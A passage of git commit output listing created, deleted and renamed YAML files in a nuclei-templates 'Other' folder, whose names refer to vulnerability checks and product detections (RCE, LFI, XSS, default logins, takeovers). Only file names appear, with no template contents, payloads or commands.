nuclei-templates/Other/mrtg-detect-8959.yaml create mode 100644 nuclei-templates/Other/mrtg-detect.yaml rename nuclei-templates/Other/{ms-exchange-server-reflected-xss-8965.yaml => ms-exchange-server-reflected-xss-8962.yaml} (100%) rename nuclei-templates/Other/{msvod-sqli.yaml => msvod-sqli-8969.yaml} (100%) create mode 100644 nuclei-templates/Other/mysql-native-password-8980.yaml delete mode 100644 nuclei-templates/Other/mysql-native-password.yaml delete mode 100644 nuclei-templates/Other/nagios-default-credential-8988.yaml create mode 100644 nuclei-templates/Other/nagios-default-credential.yaml delete mode 100644 nuclei-templates/Other/nagios-default-login-8993.yaml create mode 100644 nuclei-templates/Other/nagios-default-login.yaml rename nuclei-templates/Other/{nativechurch-wp-theme-lfd-9003.yaml => nativechurch-wp-theme-lfd-8999.yaml} (100%) create mode 100644 nuclei-templates/Other/natshell-path-traversal-9005.yaml delete mode 100644 nuclei-templates/Other/natshell-path-traversal-9006.yaml create mode 100644 nuclei-templates/Other/neighborly.yaml rename nuclei-templates/Other/{neos-detect.yaml => neos-detect-9014.yaml} (100%) rename nuclei-templates/Other/{Netcore-unauth.yaml => netcore-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/netflix-conductor-ui-9023.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-ui.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-version-9024.yaml create mode 100644 nuclei-templates/Other/netflix-conductor-version.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-1.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-2.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-9027.yaml delete mode 100644 nuclei-templates/Other/netgear-router-auth-bypass.yaml create mode 100644 nuclei-templates/Other/netgear-router-exposure-9031.yaml delete mode 100644 nuclei-templates/Other/netgear-router-exposure.yaml rename 
nuclei-templates/Other/{netgear-wnap320-rce.yaml => netgear-wnap320-rce-9032.yaml} (100%) delete mode 100644 nuclei-templates/Other/netis-info-leak-9036.yaml create mode 100644 nuclei-templates/Other/netis-info-leak.yaml rename nuclei-templates/Other/{netis-router.yaml => netis-router-9037.yaml} (100%) create mode 100644 nuclei-templates/Other/netman_204_firmware.yaml create mode 100644 nuclei-templates/Other/netrc-9045.yaml delete mode 100644 nuclei-templates/Other/netrc-9046.yaml delete mode 100644 nuclei-templates/Other/netscaler-aaa-login-9050.yaml create mode 100644 nuclei-templates/Other/netscaler-aaa-login.yaml create mode 100644 nuclei-templates/Other/netscaler-gateway-9055.yaml delete mode 100644 nuclei-templates/Other/netscaler-gateway.yaml create mode 100644 nuclei-templates/Other/netsus-server-login-9062.yaml delete mode 100644 nuclei-templates/Other/netsus-server-login.yaml rename nuclei-templates/Other/{netsweeper-open-redirect-9063.yaml => netsweeper-open-redirect-9064.yaml} (100%) create mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect-9066.yaml delete mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect.yaml delete mode 100644 nuclei-templates/Other/netterce.yaml create mode 100644 nuclei-templates/Other/network_security_manager.yaml create mode 100644 nuclei-templates/Other/next-gen_application_firewall.yaml rename nuclei-templates/Other/{nextcloud-detect.yaml => nextcloud-detect-9079.yaml} (100%) delete mode 100644 nuclei-templates/Other/nextcloud-install-9082.yaml create mode 100644 nuclei-templates/Other/nextcloud-install-9085.yaml create mode 100644 nuclei-templates/Other/nexus-default-login-9086.yaml delete mode 100644 nuclei-templates/Other/nexus-default-login.yaml rename nuclei-templates/Other/{nexus-detect.yaml => nexus-detect-9094.yaml} (100%) create mode 100644 nuclei-templates/Other/nginx-Detect.yaml delete mode 100644 nuclei-templates/Other/nginx-detect.yaml create mode 100644 
nuclei-templates/Other/nginx-linux-page-9102.yaml delete mode 100644 nuclei-templates/Other/nginx-linux-page.yaml create mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9108.yaml delete mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9109.yaml create mode 100644 nuclei-templates/Other/nginx-proxy-manager-9111.yaml delete mode 100644 nuclei-templates/Other/nginx-proxy-manager.yaml create mode 100644 nuclei-templates/Other/nginx-version-9121.yaml delete mode 100644 nuclei-templates/Other/nginx-version.yaml rename nuclei-templates/Other/{niagara-fox-protocol-enum.yaml => niagara-fox-info-enum.yaml} (100%) create mode 100644 nuclei-templates/Other/nifi.yaml create mode 100644 nuclei-templates/Other/ninjaform-open-redirect-9133.yaml delete mode 100644 nuclei-templates/Other/ninjaform-open-redirect-9134.yaml create mode 100644 nuclei-templates/Other/node-integration-enabled-9136.yaml delete mode 100644 nuclei-templates/Other/node-integration-enabled-9137.yaml rename nuclei-templates/Other/{node-red-detect.yaml => node-red-detect-9139.yaml} (100%) create mode 100644 nuclei-templates/Other/notebook.yaml delete mode 100644 nuclei-templates/Other/npm-log-file-9141.yaml create mode 100644 nuclei-templates/Other/npm-log-file.yaml rename nuclei-templates/Other/{nps-default-login-9145.yaml => nps-default-login-9142.yaml} (100%) create mode 100644 nuclei-templates/Other/ns-asg.yaml create mode 100644 nuclei-templates/Other/nuuno-network-login-9161.yaml delete mode 100644 nuclei-templates/Other/nuuno-network-login.yaml create mode 100644 nuclei-templates/Other/nuuo-nvrmini2-rce-9170.yaml delete mode 100644 nuclei-templates/Other/nuuo-nvrmini2-rce-9171.yaml create mode 100644 nuclei-templates/Other/o2oa.yaml rename nuclei-templates/Other/{oa-tongda-path-traversal.yaml => oa-tongda-path-traversal-9178.yaml} (100%) create mode 100644 nuclei-templates/Other/oa-v9-uploads-file-9191.yaml delete mode 100644 nuclei-templates/Other/oa-v9-uploads-file.yaml create mode 100644 
nuclei-templates/Other/oauth-access-key-9184.yaml delete mode 100755 nuclei-templates/Other/oauth-access-key-9186.yaml rename nuclei-templates/Other/{oauth2-detect-9183.yaml => oauth2-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/octobercms-default-login-9192.yaml delete mode 100644 nuclei-templates/Other/octobercms-default-login-9193.yaml rename nuclei-templates/Other/{octobercms-detect.yaml => octobercms-detect-9195.yaml} (100%) rename nuclei-templates/Other/{octoprint-login.yaml => octoprint-login-9198.yaml} (100%) rename nuclei-templates/Other/{odoo-cms-redirect.yaml => odoo-cms-redirect-9199.yaml} (100%) create mode 100644 nuclei-templates/Other/ofbiz-default-login-9208.yaml delete mode 100644 nuclei-templates/Other/ofbiz-default-login.yaml create mode 100644 nuclei-templates/Other/office-documents-links.yaml rename nuclei-templates/Other/{office365-open-redirect-9215.yaml => office365-open-redirect-9214.yaml} (100%) create mode 100644 nuclei-templates/Other/office_anywhere.yaml create mode 100644 nuclei-templates/Other/office_web_apps_server.yaml delete mode 100644 nuclei-templates/Other/officedocuments.yaml rename nuclei-templates/Other/{oipm-detect-9219.yaml => oipm-detect-9221.yaml} (100%) create mode 100644 nuclei-templates/Other/okiko-sfiler-portal-9230.yaml delete mode 100644 nuclei-templates/Other/okiko-sfiler-portal.yaml delete mode 100644 nuclei-templates/Other/okta-panel-9234.yaml create mode 100644 nuclei-templates/Other/okta-panel.yaml create mode 100644 nuclei-templates/Other/old-copyright-9236.yaml delete mode 100644 nuclei-templates/Other/old-copyright.yaml delete mode 100644 nuclei-templates/Other/oliver-library-lfi-9239.yaml create mode 100644 nuclei-templates/Other/oliver-library-lfi-9241.yaml delete mode 100644 nuclei-templates/Other/olivetti-crf-detect-9244.yaml create mode 100644 nuclei-templates/Other/olivetti-crf-detect.yaml create mode 100644 nuclei-templates/Other/ollama.yaml delete mode 100644 
nuclei-templates/Other/one_line_checks_nuclei.yaml create mode 100644 nuclei-templates/Other/onliner-multiple-bugs.yaml rename nuclei-templates/Other/{opcache-status-exposure-9255.yaml => opcache-status-exposure-9254.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-game-panel-9279.yaml create mode 100644 nuclei-templates/Other/open-game-panel.yaml mode change 100755 => 100644 nuclei-templates/Other/open-mjpg-streamer-9284.yaml delete mode 100644 nuclei-templates/Other/open-proxy-internal-9288.yaml create mode 100644 nuclei-templates/Other/open-proxy-internal.yaml rename nuclei-templates/Other/{open-proxy-localhost-9293.yaml => open-proxy-localhost.yaml} (100%) create mode 100644 nuclei-templates/Other/open-redirect-9309.yaml create mode 100644 nuclei-templates/Other/open-redirect-plus.yaml delete mode 100644 nuclei-templates/Other/open-redirect.yaml delete mode 100644 nuclei-templates/Other/open-redirect2.yaml create mode 100644 nuclei-templates/Other/open-stack-dashboard-login-9324.yaml delete mode 100644 nuclei-templates/Other/open-stack-dashboard-login.yaml rename nuclei-templates/Other/{open-virtualization-manager-detect.yaml => open-virtualization-manager-detect-9325.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-virtualization-manager-panel-9328.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-panel.yaml rename nuclei-templates/Other/{openam-workflow.yaml => openam-workflow-9259.yaml} (100%) rename nuclei-templates/Other/{openbmcs-secret-disclosure.yaml => openbmcs-secret-disclosure-9260.yaml} (100%) rename nuclei-templates/Other/{openbmcs-ssrf.yaml => openbmcs-ssrf-9261.yaml} (100%) create mode 100644 nuclei-templates/Other/opencast-detect-9263.yaml delete mode 100644 nuclei-templates/Other/opencast-detect.yaml create mode 100644 nuclei-templates/Other/opencti-lfi-9268.yaml delete mode 100644 nuclei-templates/Other/opencti-lfi.yaml create mode 100644 nuclei-templates/Other/openemr-default-login-9269.yaml 
delete mode 100644 nuclei-templates/Other/openemr-default-login.yaml create mode 100644 nuclei-templates/Other/openemr-detect-9271.yaml delete mode 100644 nuclei-templates/Other/openemr-detect.yaml delete mode 100644 nuclei-templates/Other/openerp-database-9275.yaml create mode 100644 nuclei-templates/Other/openerp-database.yaml delete mode 100644 nuclei-templates/Other/opengear-detect.yaml create mode 100644 nuclei-templates/Other/openmediavault.yaml rename nuclei-templates/Other/{opennms-web-console.yaml => opennms-web-console-9287.yaml} (100%) create mode 100644 nuclei-templates/Other/openshift_origin.yaml delete mode 100644 nuclei-templates/Other/opensis-detect-9314.yaml create mode 100644 nuclei-templates/Other/opensis-lfi-9315.yaml delete mode 100644 nuclei-templates/Other/opensis-lfi.yaml create mode 100644 nuclei-templates/Other/opensis-panel.yaml rename nuclei-templates/Other/{opensis-workflow-9319.yaml => opensis-workflow.yaml} (100%) rename nuclei-templates/Other/{openvpn-hhi.yaml => openvpn-hhi-9329.yaml} (100%) delete mode 100644 nuclei-templates/Other/openvpn-monitor-9331.yaml create mode 100644 nuclei-templates/Other/openvpn-monitor.yaml create mode 100644 nuclei-templates/Other/openwrt-default-login-9332.yaml delete mode 100644 nuclei-templates/Other/openwrt-default-login.yaml delete mode 100644 nuclei-templates/Other/openwrt-login-9333.yaml create mode 100644 nuclei-templates/Other/openwrt-login.yaml delete mode 100644 nuclei-templates/Other/openx-detect-9334.yaml create mode 100644 nuclei-templates/Other/openx-detect.yaml create mode 100644 nuclei-templates/Other/operations-automation-default-page-9337.yaml delete mode 100644 nuclei-templates/Other/operations-automation-default-page.yaml create mode 100644 nuclei-templates/Other/optilink-ont1gew-gpon-rce-9342.yaml delete mode 100644 nuclei-templates/Other/optilink-ont1gew-gpon-rce.yaml rename nuclei-templates/Other/{oracle-business-control.yaml => oracle-business-control-9347.yaml} (100%) delete 
mode 100644 nuclei-templates/Other/oracle-dbcs-9353.yaml create mode 100644 nuclei-templates/Other/oracle-dbcs.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access-9358.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access.yaml rename nuclei-templates/Other/{oracle-ebs-credentials.yaml => oracle-ebs-credentials-9365.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-ebs-credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-sqllog-disclosure-9371.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-sqllog-disclosure.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-xss-9375.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-xss-9376.yaml delete mode 100644 nuclei-templates/Other/oracle-fatwire-lfi-9378.yaml create mode 100644 nuclei-templates/Other/oracle-fatwire-lfi.yaml create mode 100644 nuclei-templates/Other/oracle-httpserver-12c.yaml delete mode 100644 nuclei-templates/Other/oracle-httpserver12c.yaml delete mode 100644 nuclei-templates/Other/oracle-integrated-manager-9386.yaml create mode 100644 nuclei-templates/Other/oracle-integrated-manager.yaml rename nuclei-templates/Other/{oracle-iplanet-web-server.yaml => oracle-iplanet-web-server-9392.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-oam-xss(1).yaml delete mode 100644 nuclei-templates/Other/oracle-people-enterprise-9398.yaml create mode 100644 nuclei-templates/Other/oracle-people-enterprise.yaml delete mode 100644 nuclei-templates/Other/oracle-people-sign-in-9399.yaml create mode 100644 nuclei-templates/Other/oracle-people-sign-in.yaml rename nuclei-templates/Other/{oracle-siebel-xss.yaml => oracle-siebel-xss-9402.yaml} (100%) rename nuclei-templates/Other/{oracle-tns-listner.yaml => oracle-tns-listener.yaml} (100%) rename nuclei-templates/Other/{orbiteam-bscw-server-lfi.yaml => orbiteam-bscw-server-lfi-9404.yaml} (100%) create mode 100644 
nuclei-templates/Other/oscommerce-rce-9408.yaml delete mode 100644 nuclei-templates/Other/oscommerce-rce.yaml rename nuclei-templates/Other/{otobo-open-redirect.yaml => otobo-open-redirect-9411.yaml} (100%) create mode 100644 nuclei-templates/Other/otobo-panel-9412.yaml delete mode 100644 nuclei-templates/Other/otobo-panel.yaml create mode 100644 nuclei-templates/Other/owasp-juice-shop-detected-9418.yaml delete mode 100644 nuclei-templates/Other/owasp-juice-shop-detected.yaml rename nuclei-templates/Other/{owncloud-config.yaml => owncloud-config-9420.yaml} (100%) rename nuclei-templates/Other/{package-json-9421.yaml => package-json-9423.yaml} (100%) create mode 100644 nuclei-templates/Other/pacs-connexion-utilisateur-9424.yaml delete mode 100644 nuclei-templates/Other/pacs-connexion-utilisateur.yaml create mode 100644 nuclei-templates/Other/pacsone-server-lfi-9430.yaml delete mode 100644 nuclei-templates/Other/pacsone-server-lfi.yaml rename nuclei-templates/Other/{api-pagerduty-475.yaml => pagerduty.yaml} (100%) rename nuclei-templates/Other/{pagewiz-takeover.yaml => pagewiz-takeover-9436.yaml} (100%) rename nuclei-templates/Other/{panabit-default-password.yaml => panabit-default-password-9441.yaml} (100%) rename nuclei-templates/Other/{Panabit-sy_addmount-rce.yaml => panabit-sy_addmount-rce.yaml} (100%) rename nuclei-templates/Other/{panalog-fileread.yaml => panalog-fileRead.yaml} (100%) create mode 100644 nuclei-templates/Other/panasonic-network-management-9450.yaml delete mode 100644 nuclei-templates/Other/panasonic-network-management.yaml create mode 100644 nuclei-templates/Other/pandora-fms-console-9451.yaml delete mode 100644 nuclei-templates/Other/pandora-fms-console.yaml rename nuclei-templates/Other/{panos-default-login.yaml => panos-default-login-9454.yaml} (100%) delete mode 100644 nuclei-templates/Other/parallels-html-client-9462.yaml create mode 100644 nuclei-templates/Other/parallels-html-client.yaml create mode 100644 
nuclei-templates/Other/parameters-config-9465.yaml delete mode 100644 nuclei-templates/Other/parameters-config.yaml create mode 100644 nuclei-templates/Other/path-traversal.yaml rename nuclei-templates/Other/{paypal-braintree-token.yaml => paypal-braintree-token-11856.yaml} (100%) delete mode 100644 nuclei-templates/Other/pbootcms-database-file-download-9469.yaml create mode 100644 nuclei-templates/Other/pbootcms-database-file-download.yaml create mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce.yaml create mode 100644 nuclei-templates/Other/pdf-thumbnail-generator.yaml rename nuclei-templates/Other/{pega-detect.yaml => pega-detect-9474.yaml} (100%) create mode 100644 nuclei-templates/Other/pelco_videoxpert.yaml rename nuclei-templates/Other/{pentaho-default-login.yaml => pentaho-default-login-9478.yaml} (100%) rename nuclei-templates/Other/{pentaho-panel-9483.yaml => pentaho-panel-9481.yaml} (100%) create mode 100644 nuclei-templates/Other/peoplesoft_enterprise_peopletools.yaml rename nuclei-templates/Other/{perl-scanner.yaml => perl-scanner-9484.yaml} (100%) delete mode 100644 nuclei-templates/Other/perl-status-9487.yaml create mode 100644 nuclei-templates/Other/perl-status.yaml delete mode 100644 nuclei-templates/Other/pgadmin-exposure-9488.yaml create mode 100644 nuclei-templates/Other/pgadmin-exposure.yaml rename nuclei-templates/Other/{phalcon-framework-source-9494.yaml => phalcon-framework-source-9495.yaml} (100%) delete mode 100644 nuclei-templates/Other/phoronix-pane.yaml create mode 100644 nuclei-templates/Other/phoronix-panel.yaml delete mode 100644 nuclei-templates/Other/php-backup-files-9497.yaml create mode 100644 nuclei-templates/Other/php-backup-files.yaml rename nuclei-templates/Other/{php-debug-bar.yaml => php-debug-bar-9506.yaml} (100%) create mode 100644 nuclei-templates/Other/php-errors-9511.yaml delete mode 100644 nuclei-templates/Other/php-errors.yaml delete 
mode 100644 nuclei-templates/Other/php-ini-9523.yaml create mode 100644 nuclei-templates/Other/php-ini.yaml create mode 100644 nuclei-templates/Other/php-proxy-detect-9544.yaml delete mode 100644 nuclei-templates/Other/php-proxy-detect.yaml create mode 100644 nuclei-templates/Other/php-timeclock-xss-9554.yaml delete mode 100644 nuclei-templates/Other/php-timeclock-xss.yaml rename nuclei-templates/Other/{php-user-ini-disclosure.yaml => php-user-ini-disclosure-9559.yaml} (100%) delete mode 100644 nuclei-templates/Other/phpMyAdmin-setup.yaml rename nuclei-templates/Other/{phpcollab-detect-9499.yaml => phpcollab-detect-9501.yaml} (100%) delete mode 100644 nuclei-templates/Other/phpinfo-9517.yaml create mode 100644 nuclei-templates/Other/phpinfo-9521.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-panel-9526.yaml delete mode 100644 nuclei-templates/Other/phpmyadmin-panel-9528.yaml rename nuclei-templates/Other/{pma-server-import.yaml => phpmyadmin-server-import.yaml} (100%) create mode 100644 nuclei-templates/Other/phpmyadmin-setup-9531.yaml create mode 100644 nuclei-templates/Other/phpok-sqli-9538.yaml delete mode 100644 nuclei-templates/Other/phppgadmin-panel-9539.yaml create mode 100644 nuclei-templates/Other/phppgadmin-panel-9542.yaml delete mode 100644 nuclei-templates/Other/phpunit-9557.yaml create mode 100644 nuclei-templates/Other/phpunit.yaml create mode 100644 nuclei-templates/Other/phpwiki-lfi-9564.yaml delete mode 100644 nuclei-templates/Other/phpwiki-lfi-9568.yaml rename nuclei-templates/Other/{pi-hole-detect.yaml => pi-hole-detect-9581.yaml} (100%) rename nuclei-templates/Other/{Pictatic-API-key.yaml => pictatic-api-key-9576.yaml} (100%) delete mode 100644 nuclei-templates/Other/pieregister-plugin-open-redirect.yaml create mode 100644 nuclei-templates/Other/pikpikcussti.yaml create mode 100644 nuclei-templates/Other/pingdom-takeover-9585.yaml delete mode 100644 nuclei-templates/Other/pingdom-takeover.yaml create mode 100644 
nuclei-templates/Other/pinpoint-unauth-9590.yaml delete mode 100644 nuclei-templates/Other/pinpoint-unauth.yaml delete mode 100644 nuclei-templates/Other/plesk-onyx-login.yaml create mode 100644 nuclei-templates/Other/plesk-onyx.yaml rename nuclei-templates/Other/{plesk-stat.yaml => plesk-stat-9604.yaml} (100%) create mode 100644 nuclei-templates/Other/plone-cms-detect-9607.yaml delete mode 100644 nuclei-templates/Other/plone-cms-detect.yaml delete mode 100644 nuclei-templates/Other/plugin.yaml create mode 100644 nuclei-templates/Other/pmb-directory-traversal-9611.yaml delete mode 100644 nuclei-templates/Other/pmb-directory-traversal.yaml delete mode 100644 nuclei-templates/Other/pollbot-redirect-9622.yaml create mode 100644 nuclei-templates/Other/pollbot-redirect.yaml rename nuclei-templates/Other/{polycom-login.yaml => polycom-login-9627.yaml} (100%) rename nuclei-templates/Other/{portainer-init-deploy.yaml => portainer-init-deploy-9628.yaml} (100%) create mode 100644 nuclei-templates/Other/possible-AEM-secrets.yaml delete mode 100644 nuclei-templates/Other/postmessage-outgoing-tracker-9636.yaml create mode 100644 nuclei-templates/Other/postmessage-outgoing-tracker.yaml create mode 100644 nuclei-templates/Other/postmessage-tracker-9639.yaml delete mode 100644 nuclei-templates/Other/postmessage-tracker.yaml create mode 100644 nuclei-templates/Other/powercreator-cms-rce-9644.yaml delete mode 100644 nuclei-templates/Other/powercreator-cms-rce.yaml rename nuclei-templates/Other/{powerlogic-ion.yaml => powerlogic-ion-9648.yaml} (100%) rename nuclei-templates/Other/{prestashop-detect.yaml => prestashop-detect-9651.yaml} (100%) create mode 100644 nuclei-templates/Other/prison_management_system.yaml rename nuclei-templates/Other/{private-key-9655.yaml => private-key-9656.yaml} (100%) create mode 100644 nuclei-templates/Other/processmaker-lfi-9659.yaml delete mode 100644 nuclei-templates/Other/processmaker-lfi.yaml create mode 100644 
nuclei-templates/Other/production-logs-9664.yaml delete mode 100644 nuclei-templates/Other/production-logs.yaml delete mode 100644 nuclei-templates/Other/prometheus-exporter-detect-9676.yaml create mode 100644 nuclei-templates/Other/prometheus-exporter-detect.yaml rename nuclei-templates/Other/{prometheus-flags.yaml => prometheus-flags-9687.yaml} (100%) create mode 100644 nuclei-templates/Other/prometheus-flags-endpoint-9685.yaml create mode 100644 nuclei-templates/Other/prometheus-targets-9690.yaml create mode 100644 nuclei-templates/Other/prometheus-targets-endpoint.yaml delete mode 100644 nuclei-templates/Other/prometheus-targets.yaml create mode 100644 nuclei-templates/Other/promothoues-panel (copy 1).yaml delete mode 100644 nuclei-templates/Other/promothoues-panel.yaml create mode 100644 nuclei-templates/Other/proposify-takeover-9695.yaml delete mode 100644 nuclei-templates/Other/proposify-takeover.yaml delete mode 100644 nuclei-templates/Other/prototype-pollution-check-9697.yaml create mode 100644 nuclei-templates/Other/prototype-pollution-check.yaml rename nuclei-templates/Other/{provider-path-9702.yaml => provider-path.yaml} (100%) rename nuclei-templates/Other/{prtg-detect-9703.yaml => prtg-detect-9706.yaml} (100%) rename nuclei-templates/Other/{ptr-fingerprint.yaml => ptr-fingerprint-9707.yaml} (100%) delete mode 100644 nuclei-templates/Other/pulse-secure-panel-9714.yaml create mode 100644 nuclei-templates/Other/pulse-secure-panel.yaml rename nuclei-templates/Other/{puppet-node-manager-detect.yaml => puppet-node-manager-detect-9720.yaml} (100%) create mode 100644 nuclei-templates/Other/puppetboard-panel-9716.yaml delete mode 100644 nuclei-templates/Other/puppetboard-panel.yaml create mode 100644 nuclei-templates/Other/puppetserver-detect-9721.yaml delete mode 100644 nuclei-templates/Other/puppetserver-detect.yaml delete mode 100644 nuclei-templates/Other/put-m-enb.yaml create mode 100644 nuclei-templates/Other/put-method-enabled.yaml create mode 100644 
nuclei-templates/Other/putMethod-1.yaml create mode 100644 nuclei-templates/Other/putMethod-2.yaml rename nuclei-templates/Other/{putty-private-key-disclosure-9731.yaml => putty-private-key-disclosure.yaml} (100%) create mode 100644 nuclei-templates/Other/pypicloud-panel-9734.yaml delete mode 100644 nuclei-templates/Other/pypicloud-panel.yaml rename nuclei-templates/Other/{pyproject-disclosure-9736.yaml => pyproject-disclosure-9737.yaml} (100%) rename nuclei-templates/Other/{pyspider-unauthorized-access.yaml => pyspider-unauthorized-access-9743.yaml} (100%) rename nuclei-templates/Other/{python-app-sql-exceptions.yaml => python-app-sql-exceptions-9744.yaml} (100%) create mode 100644 nuclei-templates/Other/python-metrics-9747.yaml delete mode 100644 nuclei-templates/Other/python-metrics.yaml create mode 100644 nuclei-templates/Other/qdpm-info-leak-9754.yaml delete mode 100644 nuclei-templates/Other/qdpm-info-leak.yaml rename nuclei-templates/Other/{qi-anxin-netkang-next-generation-firewall-rce-9757.yaml => qi-anxin-netkang-next-generation-firewall-rce-9755.yaml} (100%) create mode 100644 nuclei-templates/Other/qihang-media-disclosure-9762.yaml delete mode 100644 nuclei-templates/Other/qihang-media-disclosure-9764.yaml rename nuclei-templates/Other/{2378487680.yaml => quasar.yaml} (100%) create mode 100644 nuclei-templates/Other/qvisdvr-deserialization-rce-9774.yaml delete mode 100644 nuclei-templates/Other/qvisdvr-deserialization-rce.yaml delete mode 100644 nuclei-templates/Other/r-webserver-login-9956.yaml create mode 100644 nuclei-templates/Other/r-webserver-login.yaml delete mode 100644 nuclei-templates/Other/rabbitmq-dashboard-9776.yaml create mode 100644 nuclei-templates/Other/rabbitmq-dashboard-9779.yaml delete mode 100644 nuclei-templates/Other/rabbitmq-default-admin-9782.yaml create mode 100644 nuclei-templates/Other/rabbitmq-default-admin.yaml rename nuclei-templates/Other/{rabbitmq-default-login.yaml => rabbitmq-default-login-9783.yaml} (100%) create mode 
100644 nuclei-templates/Other/rack-mini-profiler-9792.yaml delete mode 100644 nuclei-templates/Other/rack-mini-profiler.yaml create mode 100644 nuclei-templates/Other/raidenmaild.yaml create mode 100644 nuclei-templates/Other/rails-secret-token-disclosure-9810.yaml delete mode 100644 nuclei-templates/Other/rails-secret-token-disclosure.yaml rename nuclei-templates/Other/{rails6-xss-9797.yaml => rails6-xss-9798.yaml} (100%) create mode 100644 nuclei-templates/Other/rainloop-default-login-9811.yaml delete mode 100644 nuclei-templates/Other/rainloop-default-login.yaml rename nuclei-templates/Other/{rancher-default-login.yaml => rancher-default-login-9816.yaml} (100%) create mode 100644 nuclei-templates/Other/ranger-default-login-9827.yaml delete mode 100644 nuclei-templates/Other/ranger-default-login.yaml create mode 100644 nuclei-templates/Other/ranger.yaml delete mode 100644 nuclei-templates/Other/rce-shellshock-user-agent-9831.yaml create mode 100644 nuclei-templates/Other/rce-shellshock-user-agent-9833.yaml create mode 100644 nuclei-templates/Other/rconfig-file-upload.yaml rename nuclei-templates/Other/{rdp-detect.yaml => rdp-detect-9839.yaml} (100%) create mode 100644 nuclei-templates/Other/readme-takeover-9843.yaml delete mode 100644 nuclei-templates/Other/readme-takeover.yaml rename nuclei-templates/Other/{readthedocs-takeover.yaml => readthedocs-takeover-9846.yaml} (100%) delete mode 100644 nuclei-templates/Other/redash-detection.yaml create mode 100644 nuclei-templates/Other/redash-panel.yaml create mode 100644 nuclei-templates/Other/redis.yaml delete mode 100644 nuclei-templates/Other/reflected-xss.yaml delete mode 100644 nuclei-templates/Other/reflection-ssti.yaml rename nuclei-templates/Other/{remkon-manager-detect.yaml => remkon-manager-detect-9857.yaml} (100%) create mode 100644 nuclei-templates/Other/remote-ui-login-9861.yaml delete mode 100644 nuclei-templates/Other/remote-ui-login.yaml create mode 100644 nuclei-templates/Other/remote_support.yaml 
rename nuclei-templates/Other/{resin-inputfile-fileread-9871.yaml => resin-inputfile-fileread-9868.yaml} (100%) create mode 100644 nuclei-templates/Other/resin-viewfile-lfr-9875.yaml delete mode 100644 nuclei-templates/Other/resin-viewfile-lfr.yaml delete mode 100644 nuclei-templates/Other/response-ssrf.yaml create mode 100644 nuclei-templates/Other/rg-uac.yaml create mode 100644 nuclei-templates/Other/rg-uac_firmware.yaml rename nuclei-templates/Other/{rhymix-cms-detect.yaml => rhymix-cms-detect-9877.yaml} (100%) rename nuclei-templates/Other/{ricoh-weak-password.yaml => ricoh-weak-password-9883.yaml} (100%) delete mode 100644 nuclei-templates/Other/robomongo-credential-9885.yaml create mode 100644 nuclei-templates/Other/robomongo-credential.yaml create mode 100644 nuclei-templates/Other/robots-9887.yaml delete mode 100644 nuclei-templates/Other/robots.txt.yaml rename nuclei-templates/Other/{rocketmq-console-exposure.yaml => rocketmq-console-exposure-9894.yaml} (100%) rename nuclei-templates/Other/{rockmongo-default-login-9900.yaml => rockmongo-default-login-9899.yaml} (100%) rename nuclei-templates/Other/{rockmongo-xss.yaml => rockmongo-xss-9902.yaml} (100%) delete mode 100644 nuclei-templates/Other/roundcube-log-disclosure-9905.yaml create mode 100644 nuclei-templates/Other/roundcube-log-disclosure-9906.yaml delete mode 100644 nuclei-templates/Other/rsa-self-service-9910.yaml create mode 100644 nuclei-templates/Other/rsa-self-service-9912.yaml delete mode 100644 nuclei-templates/Other/rseenet-default-login-9913.yaml create mode 100644 nuclei-templates/Other/rseenet-default-login.yaml rename nuclei-templates/Other/{rseenet-detect.yaml => rseenet-detect-9916.yaml} (100%) rename nuclei-templates/Other/{rstudio-detect.yaml => rstudio-detect-9919.yaml} (100%) create mode 100644 nuclei-templates/Other/rt-n16.yaml delete mode 100644 nuclei-templates/Other/ruby-open-rce.yaml rename nuclei-templates/Other/{Ruijie-EG-passLeak.yaml => ruijie-eg-passleak.yaml} (100%) create 
mode 100644 nuclei-templates/Other/ruijie-eg-password-leak-9922.yaml delete mode 100644 nuclei-templates/Other/ruijie-eg-password-leak.yaml create mode 100644 nuclei-templates/Other/ruijie-eg-rce-9925.yaml delete mode 100644 nuclei-templates/Other/ruijie-eg-rce-9929.yaml create mode 100644 nuclei-templates/Other/ruijie-information-disclosure-9931.yaml delete mode 100644 nuclei-templates/Other/ruijie-information-disclosure.yaml rename nuclei-templates/Other/{ruijie-nbr1300g-exposure.yaml => ruijie-nbr1300g-exposure-9936.yaml} (100%) create mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9941.yaml delete mode 100644 nuclei-templates/Other/ruijie-networks-lfi.yaml create mode 100644 nuclei-templates/Other/ruijie-phpinfo-9952.yaml delete mode 100644 nuclei-templates/Other/ruijie-phpinfo.yaml create mode 100644 nuclei-templates/Other/rundeck.yaml rename nuclei-templates/Other/{nuclei_template.yaml => rxss.yaml} (100%) create mode 100644 nuclei-templates/Other/s14.yaml rename nuclei-templates/Other/{s3-detect-9964.yaml => s3-detect-9963.yaml} (100%) create mode 100644 nuclei-templates/Other/s3-subtakeover-9968.yaml delete mode 100644 nuclei-templates/Other/s3-subtakeover-9969.yaml delete mode 100644 nuclei-templates/Other/s3hunter-9966.yaml create mode 100644 nuclei-templates/Other/s3hunter.yaml create mode 100644 